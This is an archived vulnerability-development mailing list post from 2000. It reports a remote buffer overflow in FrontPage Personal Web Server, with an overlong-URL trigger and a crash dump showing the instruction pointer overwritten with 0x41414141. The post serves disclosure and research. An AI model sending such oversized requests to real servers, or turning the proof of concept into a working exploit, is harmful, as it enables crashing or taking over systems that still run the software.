Vulnerability Development mailing list archives
Re: More vulnerabilities in FP
From: webmad () MAIL RU (Roman)
Date: Mon, 24 Apr 2000 13:41:38 +0200
I don't know maybe this is already known. Microsoft FrontPage-PWS 3.0.2.926 contain buffer overflow that allows to execute arbitrary code. <A HREF="http://server/AAAAAAAAAAAAA<a">http://server/AAAAAAAAAAAAA<a</A> lots of A>AAA On remote side someone will see: VHTTPD32 caused an invalid page fault in module <unknown> at 0000:41414141. Registers: EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212 EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141 ECX=00fe52c4 DS=016f ESI=00fe7744 FS=404f EDX=bffc9490 ES=016f EDI=bff94645 GS=0000 Bytes at CS:EIP: Stack dump: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Maybe others versions of FP is vulnerable?
Current thread:
- Re: More vulnerabilities in FP Roman (Apr 24)
- Re: More vulnerabilities in FP Alfred Huger (Apr 24)